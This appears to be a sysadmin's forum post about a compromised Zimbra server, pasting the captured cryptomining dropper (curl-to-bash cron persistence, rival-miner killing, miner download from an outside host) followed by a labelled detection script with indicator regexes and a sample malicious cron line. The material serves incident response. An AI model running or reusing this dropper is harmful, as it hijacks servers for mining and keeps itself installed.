Recently I found that our Zimbra host seems to have been broken into by an attacker.
There were records of root sending mail outward, so I set always_bcc in Zimbra's Postfix to see what was actually being sent out.
It seems to be sent on a schedule through crontab, but I checked all the crontab entries under /etc and saw nothing unusual...
The mail content is as follows:
### Cron Daemon <root@> 3:00 (5 hours ago)
To: zimbra
/bin/sh: -c: line 0: syntax error near unexpected token `('
/bin/sh: -c: line 0: `/bin/bash <(curl -ksL https://cp1.awardspace.net/filemanager2/core/doc/.mz/.hEj2kQyT); /opt/zimbra/data/tmp/.z.sh'
It fetches a file by itself and disguises it as a Zimbra system file, but that file link seems to be dead now and can no longer be fetched.
The content of the fetched file is as follows:
#!/bin/bash
kill -9 $(ps aux | grep "-B -o stratum" | awk '{print $2}') 2>&1
kill -9 $(ps aux | grep "minerd" | awk '{print $2}') 2>&1
kill -9 $(ps aux | grep "-B -c /" | awk '{print $2}') 2>&1
kill -9 $(ps aux | grep "stratum" | awk '{print $2}') 2>&1
kill -9 $(ps aux | grep "java" | awk '{print $2}') 2>&1
kill -9 $(ps aux | grep "ssh-scan" | awk '{print $2}') 2>&1
kill -9 $(ps aux | grep "/bin/sh ./start" | awk '{print $2}') 2>&1
kill -9 $(ps aux | grep "zimbravm-cache" | awk '{print $2}') 2>&1
kill -9 $(ps aux | grep "/bin/bash ./a" | awk '{print $2}') 2>&1
kill -9 $(ps aux | grep "pscan" | awk '{print $2}') 2>&1
ARCH=$(uname -m)
BINNAME="zm-helper"
BINCFG="zm-helper.cfg"
if [[ $EUID -eq 0 ]]
then
    BINDIR="/sbin/"
    CFGDIR="/etc/"
    BINPATH="$BINDIR$BINNAME"
    CFGPATH="$CFGDIR$BINCFG"
fi
if [[ $EUID -ne 0 ]]
then
    BINDIR="/tmp/"
    CFGDIR="/tmp/"
    BINPATH="$BINDIR$BINNAME"
    CFGPATH="$CFGDIR$BINCFG"
fi
if [ -f /opt/zimbra/data/tmp/.z.sh ]
then
    crontab -r
    wget -q https://cp1.awardspace.net/filemanager2/core/doc/.mz/.hEj2kQyT -O /opt/zimbra/data/tmp/.z.sh
    cro='/bin/bash <(curl -ksL https://cp1.awardspace.net/filemanager2/core/doc/.mz/.hEj2kQyT); /opt/zimbra/data/tmp/.z.sh'
    (crontab -l; echo "0 /3 $cro") 2>&1 | sed "s/no crontab for $(whoami)//" | uniq | crontab -
fi
k=$(ps aux | grep "[${BINNAME:0:1}]mod -B -c ${CFGPATH:0:4}" | awk '{print $2}')
if [ ! -z "$k" ]
then
    kill -9 $(ps aux | grep "[${BINNAME:0:1}]mod -B -c ${CFGPATH:0:4}" | awk '{print $2}')
fi
[[ -f "$CFGPATH" ]] && rm -rf "$CFGPATH"
[[ -f "$BINPATH" ]] && rm -rf "$BINPATH"
(cat <<- EOF
{
"url" : "stratum+tcp://ltc.give-me-coins.com:3333",
"user" : "n0ts0me1ne.1",
"pass" : "zx1",
"quiet" : true
}
EOF
) > "$CFGPATH"
wget -q https://cp1.awardspace.net/filemanager2/core/doc/.mz/m_`uname -m` -O "$BINPATH"
chmod +x "$BINPATH"
eval "$BINPATH -B -c $CFGPATH 2> /dev/null"
chk=$(ps aux | grep "[${BINNAME:0:1}]mod" | awk '{print $2}')
if [ ! -z "$chk" ]
then
    echo "$chk"
fi
exit 1
For now I backed up and deleted the files like these, then ran
/opt/zimbra/libexec/zmfixperms --verbose --extended
to fix the permission problems.
That's about it for now; I'll reinstall the box another day.
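As an added example (not from the original post and not the captured script), here is a hunting script for the persistence and artefacts this dropper leaves behind. It reads the per-user cron spool as well as the files under /etc, because the dropper installs its entry with `crontab -` in the crontab of whatever account ran it (the cron mail above is addressed to zimbra, which is where cron sends the output of that user's jobs). It also lists the drop paths the script writes in its root and non-root branches, matches the running miner by its `-B -c <config>` argument shape rather than by the attacker-chosen file name, and copies suspects into an evidence directory before they are deleted, to support the backup-then-delete step above. Indicator strings and paths are taken from the captured script; the sample cron lines at the bottom are constructed, and their `0 */3 * * *` schedule is an assumption, since the asterisks of the captured entry did not survive on the page.

```shell
#!/bin/sh
# Added example, not from the original post: hunt for the cron persistence
# and dropped files described by the captured .z.sh script.
# Indicator strings and paths come from that script; SAMPLE_CRON is constructed.

# What the dropper leaves behind: bash fed from a curl/wget download, a drop
# path under /opt/zimbra/data/tmp, the staging host, the stratum pool URL
# and the miner's disguised name.
IOC_REGEX='(curl|wget)[^|]*\|[[:space:]]*(ba)?sh|/bin/bash <\(|/opt/zimbra/data/tmp/\.|awardspace\.net|stratum\+tcp|zm-helper'

# Paths written by the root branch, the non-root branch, and the re-downloaded dropper.
DROP_PATHS='/sbin/zm-helper /etc/zm-helper.cfg /tmp/zm-helper /tmp/zm-helper.cfg /opt/zimbra/data/tmp/.z.sh'

# Print the stdin lines that match the indicators, prefixed with a label.
# Always returns 0 so it is safe under set -e and inside loops over many files.
scan_cron_lines() {
  grep -E "$IOC_REGEX" | sed "s|^|$1: |"
  return 0
}

# Scan every place cron reads: the system files under /etc AND the per-user
# spool, which is where an entry installed with "crontab -" actually lands.
scan_host_crontabs() {
  for f in /etc/crontab /etc/cron.d/* /etc/cron.hourly/* /etc/cron.daily/* \
           /etc/cron.weekly/* /etc/cron.monthly/* \
           /var/spool/cron/* /var/spool/cron/crontabs/*; do
    [ -f "$f" ] && scan_cron_lines "$f" < "$f"
  done
  # Also ask cron directly for every account with a login shell; this catches
  # spool layouts the globs above miss. "crontab -u" needs root.
  for u in $(awk -F: '$7 !~ /(nologin|false)$/ {print $1}' /etc/passwd); do
    crontab -l -u "$u" 2>/dev/null | scan_cron_lines "crontab($u)"
  done
  return 0
}

# List the drop paths that exist under $1 (use / on the real host, a temp dir in tests).
find_dropped_files() {
  root="${1%/}"
  for p in $DROP_PATHS; do
    [ -f "$root$p" ] && echo "$root$p"
  done
  return 0
}

# The script starts "$BINPATH -B -c $CFGPATH" with the config in /etc or /tmp;
# match that argument shape, since the binary name is whatever the attacker chose.
find_miner_processes() {
  ps -eo pid=,user=,args= | grep -E -- ' -B -c /(etc|tmp)/|stratum' | grep -v grep
  return 0
}

# Copy suspect files into an evidence directory, preserving mode and mtime,
# so that a copy survives the delete step. Missing files are skipped.
preserve_evidence() {
  evidence="$1"; shift
  mkdir -p "$evidence"
  for f in "$@"; do
    [ -f "$f" ] && cp -p "$f" "$evidence/$(echo "$f" | tr '/' '_')"
  done
  return 0
}

# Constructed sample: the first line mirrors the cron entry from the e-mail
# (schedule assumed), the others are benign Zimbra-style entries.
SAMPLE_CRON='0 */3 * * * /bin/bash <(curl -ksL https://cp1.awardspace.net/filemanager2/core/doc/.mz/.hEj2kQyT); /opt/zimbra/data/tmp/.z.sh
30 2 * * * /opt/zimbra/libexec/zmdailyreport
0 * * * * /opt/zimbra/libexec/zmstatuslog'

# Self-check on the sample; only the first line is reported.
printf '%s\n' "$SAMPLE_CRON" | scan_cron_lines "sample"
```

On the affected host, run `scan_host_crontabs`, `find_dropped_files /` and `find_miner_processes` as root, then `preserve_evidence /root/evidence <paths>` before removing anything. Matching on the `-B -c` argument shape instead of the file name matters here: the captured script's own kill list shows that these droppers rename their miner from one campaign to the next, while the command-line shape stays the same.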